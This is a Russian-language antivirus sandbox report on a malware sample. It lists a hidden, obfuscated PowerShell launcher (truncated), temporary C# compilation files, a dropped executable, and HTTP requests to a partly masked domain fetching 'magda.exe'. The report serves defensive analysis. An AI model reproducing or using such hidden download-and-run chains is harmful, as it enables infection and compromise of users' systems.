Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function z9bf926 {param($qbb4b2)$j911d='p12b72';$nf43c7='';for ($i=0; $i -lt $qbb4b2.length;$i+=2){$x1f8bf=[convert]::ToByte($qbb4b2.Substring($i,2),16);$nf43c7+=[char]($x...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\ghd0fgyn.0.cs
- %TEMP%\ghd0fgyn.cmdline
- %TEMP%\ghd0fgyn.out
- %TEMP%\cscdff2.tmp
- %TEMP%\rese002.tmp
- %TEMP%\ghd0fgyn.dll
- %APPDATA%\sff9da6.exe
Удаляет следующие файлы
- %TEMP%\rese002.tmp
- %TEMP%\cscdff2.tmp
- %TEMP%\ghd0fgyn.pdb
- %TEMP%\ghd0fgyn.out
- %TEMP%\ghd0fgyn.cmdline
- %TEMP%\ghd0fgyn.0.cs
- %TEMP%\ghd0fgyn.dll
Сетевая активность
TCP
Запросы HTTP GET
- http://am###chi.biz/magda.exe
- http://am###chi.biz/cgi-sys/suspendedpage.cgi
UDP
- DNS ASK am###chi.biz
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function z9bf926 {param($qbb4b2)$j911d='p12b72';$nf43c7='';for ($i=0; $i -lt $qbb4b2.length;$i+=2){$x1f8bf=[convert]::ToByte($qbb4b2.Substring($i,2),16);$nf43c7+=[char]($x...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ghd0fgyn.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESE002.tmp" "%TEMP%\CSCDFF2.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ghd0fgyn.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESE002.tmp" "%TEMP%\CSCDFF2.tmp"
